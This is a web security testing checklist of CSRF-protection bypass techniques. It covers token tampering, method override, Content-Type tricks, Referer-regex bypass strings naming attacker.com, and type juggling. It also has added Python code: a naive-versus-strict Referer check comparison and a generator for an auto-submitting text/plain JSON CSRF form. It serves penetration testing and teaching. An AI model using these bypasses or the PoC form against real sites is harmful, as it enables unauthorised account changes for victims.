- Remove the entire token parameter (name and value), or keep the parameter name and send an empty value.
- Use any other random token of the same length.
- Use a random token that is one character shorter or one character longer (length-1 / length+1); this shows whether only the length is validated.
- Use the attacker's own valid token in the victim's session (checks whether the token is actually bound to the session).
- Change the method from POST to GET and remove the token (many frameworks only enforce CSRF checks on POST, while the handler accepts both).
- If the request is made with PUT or DELETE, try a method-override parameter, either in the query string: POST /profile/update?_method=PUT HTTP/1.1, or in the body:
POST /profile/update HTTP/1.1
Host: example.com
...
_method=PUT
An HTML form can only send GET and POST, so a PUT/DELETE endpoint that honours _method becomes reachable from a cross-site form.
- If the token is sent in a custom header, try removing the header; if the request still succeeds, the header was the only thing a cross-site form could not have supplied.
- Change the Content-Type to application/json, application/x-www-form-urlencoded, multipart/form-data, text/plain, text/xml or application/xml. Only application/x-www-form-urlencoded, multipart/form-data and text/plain can be sent by a plain cross-site form without a CORS preflight, so an endpoint that parses its body regardless of Content-Type is the interesting case.
- If a double-submit token is used (the same value in a cookie and in a body parameter or header), the server only compares the two, so anyone who can set a cookie for the domain (CRLF injection into a response header, or a cookie set from a sibling subdomain) can supply both values.
- Bypassing the Referer check:
i. If the Referer header is checked only when it is present in the request, suppress it from the CSRF PoC page with <meta name="referrer" content="no-referrer"> (older PoCs use the legacy value "never").
ii. Regex Referer bypass (a check that only looks for the string "target.com" somewhere in the header instead of parsing and comparing the origin):
https://attacker.com?target.com
https://attacker.com;target.com
https://attacker.com/target.com/../targetPATH
https://target.com.attacker.com
https://attackertarget.com
https://target.com@attacker.com (note that current browsers strip userinfo from the Referer they send)
https://attacker.com#target.com
https://attacker.com\.target.com
https://attacker.com/.target.com
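To see why these payloads work, the following added example (not part of the original checklist) runs them through a naive substring/regex Referer check and through a check that parses the header and compares scheme and hostname exactly. The trusted origin, the regex and the sample Referer values are assumptions for the demonstration; the missing-header case from point i is included as well.

```python
import re
from urllib.parse import urlsplit

# Regex-style Referer bypass payloads from the checklist (constructed test input).
BYPASS_REFERERS = [
    "https://attacker.com?target.com",
    "https://attacker.com;target.com",
    "https://attacker.com/target.com/../targetPATH",
    "https://target.com.attacker.com",
    "https://attackertarget.com",
    "https://target.com@attacker.com",
    "https://attacker.com#target.com",
    "https://attacker.com\\.target.com",   # literal backslash in the header
    "https://attacker.com/.target.com",
]

# Assumed trusted origin for the demonstration.
TRUSTED_ORIGIN = ("https", "target.com")


def naive_referer_ok(referer):
    """The flawed check: looks for the site name anywhere in the header and,
    as in point i above, skips the check entirely when the header is absent."""
    if referer is None:
        return True
    return re.search(r"https://.*target\.com", referer) is not None


def strict_referer_ok(referer):
    """Parse the header as a URL and compare scheme and hostname exactly.
    A missing header is rejected, since a PoC page can suppress it."""
    if not referer:
        return False
    parts = urlsplit(referer)
    return (parts.scheme, parts.hostname) == TRUSTED_ORIGIN


def evaluate(referers):
    """Map each candidate Referer to (naive_result, strict_result)."""
    return {r: (naive_referer_ok(r), strict_referer_ok(r)) for r in referers}


if __name__ == "__main__":
    for ref, (naive, strict) in evaluate(BYPASS_REFERERS + [None]).items():
        print(f"{str(ref):48} naive={naive!s:5} strict={strict}")
```

Every payload passes the naive check and fails the strict one; the legitimate value https://target.com/settings passes both. The hostname comparison is what matters: urlsplit puts everything before the first /, ? or # into the netloc, so the ;, \ and userinfo tricks all leave a hostname that is not target.com.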
- CSRF token stealing via XSS, HTML injection (e.g. a dangling markup injection that exfiltrates the page containing the token) or a CORS misconfiguration that lets an attacker origin read the page with credentials.
- JSON based:
i. Change the Content-Type to text/plain, application/x-www-form-urlencoded or multipart/form-data and check whether the endpoint still parses the JSON body; if it does, a form with enctype="text/plain" can deliver the JSON cross-site.
ii. Use Flash + 307 redirect (historical: a SWF on the attacker's site posted the JSON body to an attacker endpoint that answered 307 to the target, which preserves method, body and Content-Type; it needs a Flash-capable browser, so it is of little use today).
- Guessable CSRF token.
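The text/plain trick in point i depends on how a browser encodes such a form: each field is sent as name=value followed by CRLF, with no percent-encoding. The added example below (written for this page, not taken from the checklist author) splits a JSON object across the field name and value so that the inserted "=" lands inside a throwaway string member, builds the auto-submitting PoC form, and shows what a JSON parser that ignores Content-Type would receive. The target URL and e-mail address are placeholders.

```python
import html
import json

# Constructed example payload; endpoint and address are placeholders.
PAYLOAD = {"email": "attacker@example.com"}
TARGET_URL = "https://target.com/api/profile"


def text_plain_field(payload):
    """Split a JSON object into a (name, value) form field so that the '='
    the browser inserts between them ends up inside a dummy string member.
    The browser sends <name>=<value>CRLF, which is still valid JSON."""
    body = json.dumps(payload, separators=(",", ":"))
    name = body[:-1] + ',"pad":"'   # drop the closing brace, open a dummy member
    value = '"}'                    # close the dummy member and the object
    return name, value


def text_plain_body(fields):
    """Mimic the browser's enctype=text/plain encoding: name=value per line, CRLF."""
    return "".join(f"{name}={value}\r\n" for name, value in fields)


def csrf_poc_html(target_url, payload):
    """Build the auto-submitting cross-site form for the PoC page."""
    name, value = text_plain_field(payload)
    return (
        f'<form id="f" action="{html.escape(target_url, quote=True)}" '
        'method="POST" enctype="text/plain">\n'
        f'  <input type="hidden" name="{html.escape(name, quote=True)}" '
        f'value="{html.escape(value, quote=True)}">\n'
        "</form>\n<script>document.getElementById('f').submit();</script>\n"
    )


def delivered_json(payload):
    """What a server-side JSON parser sees if it ignores the Content-Type."""
    return json.loads(text_plain_body([text_plain_field(payload)]))


if __name__ == "__main__":
    print(csrf_poc_html(TARGET_URL, PAYLOAD))
    print("server parses:", delivered_json(PAYLOAD))
```

The extra "pad" member is the cost of the trick: the request body becomes {"email":"attacker@example.com","pad":"="}, which most parsers accept because unknown members are ignored. If the endpoint rejects unexpected keys, the same split can be placed inside any string-valued member the endpoint already expects.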
- Clickjacking to bypass a strong CSRF token: frame the legitimate page, which already carries a valid token, and trick the victim into submitting it.
- Type juggling: if the token is compared with a loose comparison (e.g. PHP ==), try sending another type, such as a boolean true or an integer, in a JSON body.
- Array: newemail=attacker@example.com&csrftoken[]=lol (an array where a string is expected; in older PHP versions strcmp()-style comparisons then return NULL, which a loose check treats as a match).
- Set the CSRF token to the literal string "null" or a null value, or add null bytes (%00).
- Check whether the CSRF token is sent over plain HTTP or leaks to a third party (e.g. in a URL or Referer).
- Generate multiple CSRF tokens and compare them; if part of the value is static, keep it as it is and play with the dynamic part.